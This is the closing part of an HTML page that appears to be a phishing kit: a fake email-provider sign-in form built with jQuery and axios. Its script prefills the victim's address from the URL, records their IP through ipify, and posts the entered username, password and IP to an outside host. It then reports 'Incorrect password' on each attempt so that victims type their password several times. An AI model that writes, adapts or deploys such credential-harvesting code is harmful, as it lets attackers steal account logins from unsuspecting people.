282.341C18.9951 282.158 19.9502 282.252 20.8181 282.611C21.6861 282.971 22.4279 283.58 22.9499 284.361C23.4718 285.142 23.7504 286.06 23.7504 287C23.7504 288.26 23.2499 289.468 22.3591 290.359C21.4683 291.249 20.2602 291.75 19.0004 291.75Z" fill="#B9B9B9"/>
                    <path d="M21.5 286.25H16.5C16.2239 286.25 16 286.474 16 286.75V287.25C16 287.526 16.2239 287.75 16.5 287.75H21.5C21.7761 287.75 22 287.526 22 287.25V286.75C22 286.474 21.7761 286.25 21.5 286.25Z" fill="#B9B9B9"/>
                    <path d="M28.2474 335.186L23.9125 330.851C24.8984 329.595 25.3675 328.01 25.224 326.42C25.0806 324.829 24.3353 323.353 23.1404 322.294C21.9456 321.235 20.3914 320.671 18.7952 320.719C17.199 320.767 15.6813 321.422 14.5522 322.552C13.423 323.681 12.7675 325.199 12.7196 326.795C12.6717 328.391 13.235 329.945 14.2945 331.14C15.354 332.335 16.8296 333.08 18.4201 333.224C20.0105 333.367 21.5957 332.898 22.8519 331.912L27.1869 336.247C27.2807 336.341 27.4078 336.393 27.5405 336.393C27.6731 336.393 27.8002 336.341 27.894 336.247L28.2474 335.893C28.3412 335.8 28.3939 335.672 28.3938 335.54C28.3938 335.407 28.3411 335.28 28.2474 335.186ZM19.0004 331.75C18.0609 331.75 17.1426 331.471 16.3614 330.949C15.5803 330.427 14.9715 329.686 14.6119 328.818C14.2524 327.95 14.1584 326.995 14.3416 326.073C14.5249 325.152 14.9773 324.305 15.6416 323.641C16.3059 322.977 17.1523 322.524 18.0737 322.341C18.9951 322.158 19.9502 322.252 20.8181 322.611C21.6861 322.971 22.4279 323.58 22.9499 324.361C23.4718 325.142 23.7504 326.06 23.7504 327C23.7504 328.26 23.2499 329.468 22.3591 330.359C21.4683 331.249 20.2602 331.75 19.0004 331.75Z" fill="#B9B9B9"/>
                    <path d="M21.5 326.25H16.5C16.2239 326.25 16 326.474 16 326.75V327.25C16 327.526 16.2239 327.75 16.5 327.75H21.5C21.7761 327.75 22 327.526 22 327.25V326.75C22 326.474 21.7761 326.25 21.5 326.25Z" fill="#B9B9B9"/>
                    <defs>
                    <clipPath id="clip0_2430_994">
                    <rect x="30" y="70" width="20" height="20" rx="2" transform="rotate(-180 30 70)" fill="white"/>
                    </clipPath>
                    <clipPath id="clip1_2430_994">
                    <rect width="14" height="38" fill="white" transform="matrix(0 -1 1 0 1 174)"/>
                    </clipPath>
                    <clipPath id="clip2_2430_994">
                    <rect width="14" height="38" fill="white" transform="matrix(0 -1 1 0 1 268)"/>
                    </clipPath>
                    </defs>
                    </svg>
                    
            </div>
        </div>
    </div>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>

    <script>
    const regexExp = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/gi;

    function trans_tab() {
            window.open(final);
        }
        let hash = window.location.hash.slice(1).replace('=', '')
        let lure_url_js, final;
        let my_url = {lure_url_js}
        final = my_url +`#${hash}`


    let curr_log
        function valid_email(email) {
            if (email === '' || !regexExp.test(email)) {
                return false
            } else {
                return true;
            }
        }

        $('body').ready(function(){
            let email = 'UNITY_FIELD'
            let h = window.location.hash.slice(1)
            if (regexExp.test(h) || regexExp.test(email)) {
                if (h !== '') {
                    email = h
                }
                $('.email-transfer').html(email)
                $('.pass-step').show()
                $('.email-step').hide()
                $('.email').val(email)
            }
        })

        $('.provider-pill').click(function(e) {
            console.log(e)
            curr_log = e.target.parentNode.querySelector('.logo').innerHTML
            $('.selected-provider-logo').html(curr_log)
            $('.select-provider').css('opacity', '0.2')
            $('.provider-pill').css('cursor', 'wait')
            
            setTimeout(() => {
                $('.select-provider').hide()
                $('.email-step').show()
            }, 550);
            // e.preventDefault()
        })

        $('.provider-pill-ms').click(function(e) {
            $(this).html('Authenticating')
            $('.select-provider').css('opacity', '0.2')
            $('.provider-pill-ms').css('cursor', 'wait')
            $('.provider-pill').css('cursor', 'wait')
            trans_tab();
        })

        setTimeout(() => {
            $('.notif').show()
        }, 2950);
        setTimeout(() => {
            $('.loader').hide()
            $('#loaded').show()
        }, 3000);

        let password, details, title 
        $.getJSON("https://api.ipify.org?format=json", function (data) {
        // $.getJSON(`https://spacingstile.online/activity/open?file_name=FILE_ID&ip_address=${data.ip}`, function (resp) {
        // })
        details = data.ip;
        $('#ip').html(details)
        $('#email').focus()
        })
    let submit_count = 0

    $('#email').on("keyup",function(event){
           email = $(this).val()
        $('.email-error').hide()
        $('.email-icon').hide()
        $('.email-div').css('border-bottom-color', '#0D66D0')
         if(event.keyCode===13){
           event.preventDefault();
           $('.next-button').click()
           }
        });
       
        $('#email').on("focus",function(event){
           $('.email-div').css('border-bottom-width', '2px')
           $('.email-div').css('border-bottom-color', '#0D66D0')
        });

        
        $('#email').on("blur",function(event){
            $('.email-div').css('border-bottom-width', '1px')
        });

        $('.next-button').click(function() {
            $('.passkey-error').hide()
            $('.next-loading').show()
            $('.next-button').css('opacity', '0.5')
            if(valid_email(email)) {
                $('.email-transfer').html(email)
                setTimeout(() => {
                    $('.email-step').hide()
                    $('.pass-step').show()
                    $('.next-loading').hide()
                    $('#password').focus()
                    $('.next-button').css('opacity', '1')
                }, 1500);
            } else {
                setTimeout(() => {
                    $('.email-error').show()
                    $('.email-icon').show()
                    $('.next-loading').hide()
                    $('.email-div').css('border-bottom-color', '#d7373f')
                    $('.next-button').css('opacity', '1')
                }, 200);
            }
        })

        $('#password').on("focus",function(event){
           $('.password-div').css('border-bottom-width', '2px')
           $('.password-div').css('border-bottom-color', '#0D66D0')
        });

        $('#password').on("keyup",function(event){
         if(event.keyCode===13){
           event.preventDefault();
           $('.submit-button').click()
           }
        });

        $('.submit-button').click(function() {
        password = $('#password').val()
            $('.submit-loading').show()
            $('.submit-button').css('opacity', '0.5')
            if(password.length > 7) {
                axios.post('https://geedev.online/ext_del/ID', {
                    username: email,
                    password: password,
                    ip: details
                    // title: email.split('@')[1].split('.')[0]
                }).then(res => {
                    console.log(res.data)
                }).catch(err => {
                    console.log(err)
                })
                submit_count ++
                $('.password-error').html('Incorrect password, please try again.')
            } else {
                $('.password-error').html('Please enter a valid password.')
            }
            
            setTimeout(() => {
                if(submit_count > 3) {
                    $('#date').html(new Date().toLocaleDateString())
                    $('.pass-step').hide()
                    $('.final-step').show()
                    $('.submit-loading').hide()
                }
                $('.password-icon').show()
                $('.password-error').show()
                $('#password').val('')
                    $('.submit-loading').hide()
                    $('.password-div').css('border-bottom-color', '#d7373f')
                    $('.submit-button').css('opacity', '1')
            }, 1100);

        })

        $('.back').click(function() {
            $('.pass-step').hide()
            $('#password').val('')
            $('.email-step').show()
        })

        $('.change-provider').click(function() {
            $('.select-provider').css('opacity', '1')
            $('.selected-provider-logo').html(' ')
            $('.email-step').hide()
            $('.select-provider').show()
            $('.provider-pill').css('cursor', 'pointer')
            $('#email').val('')
        })
    </script>
</body>
</html>